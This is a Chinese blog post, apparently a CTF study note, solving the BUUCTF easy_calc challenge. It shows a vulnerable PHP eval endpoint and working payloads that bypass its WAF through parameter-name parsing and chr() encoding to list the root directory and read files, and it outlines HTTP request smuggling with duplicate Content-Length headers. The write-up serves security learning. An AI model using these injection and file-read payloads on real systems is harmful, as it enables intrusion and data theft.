ctf web方向与php学习记录31之waf初见(1)

最新推荐文章于 2024-03-28 09:58:12 发布
最新推荐文章于 2024-03-28 09:58:12 发布
阅读量793 收藏 4
点赞数 1
文章标签: php 后端 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46203060/article/details/112687206
版权

这里写目录标题

一,概述

Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。

二,例题

[BUUCTF easy_calc]

一,分析

查看源码发现calc.php文件
在这里插入图片描述

直接/calc.php,看到了源码

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', 't', 'r', 'n',''', '"', '`', '[', ']','$','\','^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>

看这只要传一个值给num,如:1;phpinfo()这种参数给num即可,但发现只要传值中包含字母就会返回400错误。

二,方法

方法一:利用PHP的字符串解析特性Bypass

参考:https://www.freebuf.com/articles/web/213359.html
构造如:/calc.php?%20num=1;phpinfo()绕过waf,但在php里面仍会解析为num,因此会返回phpinfo界面。
鉴于他过滤了单引号和双引号,我们无法直接传参。
需要用到几个函数来构建取得目录:
var_dump() — 可以将变量的内部信息打印出来,可以打印出数组
scandir() — 传入目录参数,返回传入目录的文件及文件夹
chr() — 传入数字可以将ASCII码解析为字符串
readfile() — 传入文件名作为参数可以读取文件内容
file_get_contents — 传入文件名作为参数可以读取文件内容

47对应ASCII为/,所以构造?%20num=1;var_dump(scandir(chr(47))),取得根目录对应文件及文件夹名字,一般flag都在根目录下。
1array(24) { [0]=> string(1) “.” [1]=> string(2) “…” [2]=> string(10) “.dockerenv” [3]=> string(3) “bin” [4]=> string(4) “boot” [5]=> string(3) “dev” [6]=> string(3) “etc” [7]=> string(5) “f1agg” [8]=> string(4) “home” [9]=> string(3) “lib” [10]=> string(5) “lib64” [11]=> string(5) “media” [12]=> string(3) “mnt” [13]=> string(3) “opt” [14]=> string(4) “proc” [15]=> string(4) “root” [16]=> string(3) “run” [17]=> string(4) “sbin” [18]=> string(3) “srv” [19]=> string(8) “start.sh” [20]=> string(3) “sys” [21]=> string(3) “tmp” [22]=> string(3) “usr” [23]=> string(3) “var” }
可以看见有一个f1agg,构建payload:
calc.php?%20num=1;var_dump(readfile(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
也可以将readfile改为file_get_contents,结果一样,输出有些差异。
1flag{8c38cfc1-87c6-4d2e-b63a-eebd9a022a00} int(43)

方法二:利用http走私

参考:https://paper.seebug.org/1048/

简单说来就是我们抓包之后,手动添加一个Content-Length使得该包有两个。当传给服务器后,先是由代理服务器接受,代理服务器读完第一个Content-Length后将包发给了后端服务器,而后端服务器再次读取Content-Length,将我们需要的内容返回给前端,即使客户端请求的语法错误,服务器无法理解(400错误,bad request),但仍返回了部分内容。

具体操作:
大多数HTTP请求走私漏洞的出现是因为HTTP规范提供了两种不同的方法来指定请求的结束位置:Content-Length标头和Transfer-Encoding标头
(1)输入url/calc.php?num=1,并抓包。
(2)修改请求如下图,然后发送。
在这里插入图片描述

(3)获得flag过程类似方法一,如下图

在这里插入图片描述

三,后期文章

由于waf和http走私的学习过程会比较漫长,再此说明,后续的文章仅仅针对本题的知识学习与扩展。
后续文章将再次结合本题,复现waf与分享HTTP学习知识。
后续文章添加相关的标题后缀(1)、(2)、(3)等表示为同一知识体系的学习。

这周末在做梦
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
ctf通防waf
weixin_60777183的博客
11-07 784
<?php /**CTF—**/ error_reporting(0); class CTF_WAF{ public $getfilter; public $postfilter; public $cookiefilter; public $orther; public $url; public $dir; public $ip; public $Waf_switch;
CTF中AWD的waf 用于防止别人读取flag ,经过实战检验
10-08
CTF中AWD的waf 用于防止别人读取flag 。 PHP版本,经过AWD实战。 可用于各种环境下的CTF线下赛
CTF中AWD的waf 用于防止别人读取flag
10-08
CTF中AWD的waf 用于防止别人读取flag 。 PHP版本,经过AWD实战。 可用于各种环境下的CTF线下赛
ctf php fork,CTF_WAF.php
weixin_31289735的博客
03-12 186
/**CTF—**/error_reporting(0);class CTF_WAF{public $getfilter;public $postfilter;public $cookiefilter;public $orther;public $url;public $dir;public $ip;public $Waf_switch;public $resultPage;public func...
CTF-WEB做题解析
qq_63676207的博客
02-09 1236
1 view_source 这个首先下载环境打开后是这个页面 ctrl+f查看源代码发现flag cyberpeace{f6ae307bc76ed9d260c19e9936765c00 2 robots 这个下好环境后点进去显示啥都没有 看看题目是robots想到是Robots协议(也称为爬虫协议、机器人协议等)的全称是“网络爬虫排除标准”(Robots Exclusion Protocol),网站通过Robots协议告诉搜索引擎哪些页面可以抓取,哪些页面不能抓取。 Robots协议也..
CTF Web学习笔记
01-11
### CTF Web学习笔记知识点详解 #### 杂项部分 **1. 隐写术** 隐写术是一种将信息隐藏于其他非秘密数据之中的技术,这种技术通常用于隐蔽通信或数据保护。在CTF竞赛中,经常出现的情况是将flag隐藏在图像、音频...
CTF-Web-Challenge:使用PHPWeb中进行CTF挑战
03-25
1. **PHP注入**:这是最常见的Web安全漏洞之一,攻击者可以通过输入恶意数据来控制或操纵PHP代码的执行。了解如何防范SQL注入、命令注入和文件包含注入至关重要。 2. **变量和作用域**:理解PHP中的变量如何工作,...
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
ctf web解题找flag夺旗赛之常用的解题思路及技巧
12-29
ctf web解题找flag夺旗赛之常用的解题思路及技巧ctf web解题找flag夺旗赛之常用的解题思路及技巧ctf web解题找flag夺旗赛之常用的解题思路及技巧ctf web解题找flag夺旗赛之常用的解题思路及技巧ctf web解题找flag夺...
CTF工具之WEB.zip
10-07
【标题】:CTF工具之WEB.zip 【正文】: CTF(Capture The Flag)是一项网络安全竞赛,参与者通过解决各种安全挑战来展示他们的技术技能。这个名为“CTF工具之WEB.zip”的压缩包,显然是专门为参与此类比赛的选手...
CTF线下赛WAF【参考,自行修改】
热门推荐
Sp4rkW的博客
10-05 1万+
原文链接:http://www.cnblogs.com/Oran9e/p/7233478.html 作者:Oran9e 期待已久的WAF &lt;?php error_reporting(0); define('LOG_FILENAME','log.txt'); function waf() { if (!function_exis...
CTF-Web16(涉及布尔盲注脚本以及waf过滤等,难度较大)
→_→
09-16 714
16.认真一点 分析: POST提交 id=1 显示Youarein................ id=0 显示Youarenotin............... 有区别就好做了,随便输入id=1pcatissocoooooooooool还是回显Youarein 说明这是字符型注入,1开头的字符串被弱类型等于1,输入id=1'显示Youarenotin,就庆幸了,因为说明单引号没被转义(若是转义了,就应该显示Youarein)。这里作为一名ctfer,有 种直觉就是会有waf,于是PO.
探索智能WAFCTF-WAF项目深度解析
最新发布
gitblog_00022的博客
03-28 316
探索智能WAFCTF-WAF项目深度解析 项目地址:https://gitcode.com/sharpleung/CTF-WAF CTF-WAF 是一个基于Python开发的Web应用程序防火墙(WAF)项目,旨在提供安全防护,预防各种Web攻击。由SharpLeung创建并维护,这个开源项目以其灵活性和实用性吸引了广大开发者和网络安全爱好者的关注。 项目简介 CTF-WAF的设计理念是结合了传...
【红日Day13-CTF】特殊WAF SQL注入绕过
PZ的博客
01-20 1015
练习记录 复现代码: index.php <?php require 'config.php'; function dhtmlspecialchars($string) { if (is_array($string)) { foreach ($string as $key => $val) { $string[$key] ...
CTF---Web入门第十一题 PHP大法
weixin_34345560的博客
11-18 511
PHP大法分值:20 来源: DUTCTF 难度:中 参与人数:8205人 Get Flag:2923人 答题人数:3042人 解题通过率:96% 注意备份文件 解题链接: http://ctf5.shiyanbar.com/DUTCTF/index.php 原题链接:http://www.shiyanbar.com/ctf/54 【解题报告】 ...
WAF
Data & Analysis
06-13 787
Web应用防护系统(也称为:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。利用国际上公认的一种说法:Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。 中文名 Web应用防护系统 外文名 WAF 又称 网站应用级入侵防御系统 功能 专门为Web应用提供保护 目...
Waf攻防-信息收集&漏洞发现&漏洞利用&权限控制
m0_65336233的博客
11-09 1430
简单的介绍了信息收集、漏洞发现、漏洞利用和权限控制等waf绕过
include waf.php,一道ctf题的总结
weixin_34377697的博客
03-10 895
周末偶然看到学弟们在群里发的一道web题目,心血来潮决定做做,还是学到点东西,做个记录,题目地址。0x01Git源代码泄露该站点存在git源代码泄露,通过githack直接跑出代码文件。关注点有三个文件,一个是index2.php,一个是class.php,一个是waf.php,贴下关键代码。index.php12345678910111213141516171819202122232425262...
ctf awd知识分享(常用命令,不死马,waf,文件监控)
2202_75361164的博客
10-28 1204
ctf awd知识分享(常用命令,不死马,waf,文件监控)
ctf web方向怎么学习
04-27
如果你想学习CTF Web方向,建议你掌握一些基本的技能,如Web开发和网络安全知识。可以从以下几个方面入手学习: 1. 学习Web开发:HTML、CSS、JavaScript、PHP、ASP.NET等等。 2. 学习网络知识:如HTTP协议、TCP/IP协议、Web安全等等。 3. 学习常见的Web漏洞分析:如SQL注入、XSS、CSRF等等。 4. 参与CTF比赛:通过参加CTF比赛来提高自己的技术水平和经验。 5. 阅读网上的安全相关博客和论坛。 希望这些能够帮助你开始学习CTF Web方向
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

这周末在做梦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值